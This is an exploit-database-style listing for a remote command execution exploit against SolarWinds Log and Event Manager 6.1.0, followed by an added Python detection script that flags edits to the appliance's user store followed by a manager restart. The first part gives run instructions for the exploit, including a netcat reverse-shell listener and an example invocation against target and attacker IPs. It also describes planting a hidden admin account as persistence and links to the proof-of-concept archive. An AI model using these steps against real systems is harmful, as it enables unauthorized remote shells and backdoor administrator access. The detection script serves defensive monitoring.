
Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution Exploit

06 Nov 2015 00:00:00 | Reported by Chris Graham | Type: zdt | Source: 0day.today

Solarwinds Log & Event Manager/Trigeo SIM Remote Command Execution Exploit for Vulnerable Appliance v6.1.0 on Ubuntu 14.04 LT

Code
Requirements:
 
Python 2.7
netcat
 
Tested on: 
Ubuntu 14.04 LTS
 
Vulnerable Appliance Version: 6.1.0
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
 
Instructions:
 
The exploit_lem.py script must be run with sudo because it uses sockets
that bind to ports 21 and 80. These could be changed, but the rest of
the script would need to be modified as well.
 
Prior to running the python script, set up a netcat listener for the
reverse shell: netcat -l 4444
 
Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
 
After access has been gained to the appliance, a new admin user can be added to the web console
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the XML structure
for the admin user that is already in there and then change the fields to create a new user. In
order to get a valid password hash, use the gen_pass_hash.py script included with this package.
Please note that a manager restart will be needed before you can log in with the new user. This
can be accomplished by running "/etc/init.d/contego-manager restart".
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip

#  0day.today [2018-04-08]  #
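
The README above describes a two-step change after access: an edit to UserContextLibrary.xml followed by a contego-manager restart. As an added detection example (not part of the original exploit package), the following Python correlates those two events; the tab-separated event format, the one-hour window and the sample events are constructed assumptions, to be mapped onto whatever audit source (auditd, file-integrity monitoring) the appliance host provides.

```python
from dataclasses import dataclass

# Paths and command taken from the README above.
USER_STORE = "/usr/local/contego/run/manager/UserContextLibrary.xml"
RESTART_CMD = "/etc/init.d/contego-manager restart"
WINDOW_SECONDS = 3600  # assumption: restart follows the edit within an hour


@dataclass
class Event:
    ts: int      # epoch seconds
    kind: str    # "write" or "exec"
    user: str
    target: str  # file path for writes, command line for execs


def parse(line):
    """Parse one constructed event line: ts<TAB>kind<TAB>user<TAB>target."""
    ts, kind, user, target = line.rstrip("\n").split("\t", 3)
    return Event(int(ts), kind, user, target)


def find_suspect_sequences(lines, window=WINDOW_SECONDS):
    """Return (write, restart) pairs: a write to the user store followed by
    a manager restart no more than `window` seconds later."""
    events = sorted((parse(l) for l in lines if l.strip()), key=lambda e: e.ts)
    hits, pending = [], None
    for ev in events:
        if ev.kind == "write" and ev.target == USER_STORE:
            pending = ev                  # remember the most recent edit
        elif ev.kind == "exec" and ev.target == RESTART_CMD and pending:
            if ev.ts - pending.ts <= window:
                hits.append((pending, ev))
            pending = None                # a restart consumes the pending edit
    return hits


# Constructed sample events, not taken from a real appliance.
SAMPLE = [
    "1446768000\texec\troot\t" + RESTART_CMD,   # restart with no prior edit
    "1446771600\twrite\troot\t/var/log/syslog",  # unrelated write
    "1446775200\twrite\troot\t" + USER_STORE,    # edit of the user store
    "1446775290\texec\troot\t" + RESTART_CMD,   # restart 90 s after the edit
    "1446861600\twrite\troot\t" + USER_STORE,    # edit with no restart yet
]

if __name__ == "__main__":
    for w, r in find_suspect_sequences(SAMPLE):
        print(f"user store edited at {w.ts} by {w.user}; manager restarted {r.ts - w.ts}s later")
```

An edit to the user store with no matching restart (the last sample event) is not reported by this correlation and is worth a separate file-integrity alert on the same path.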
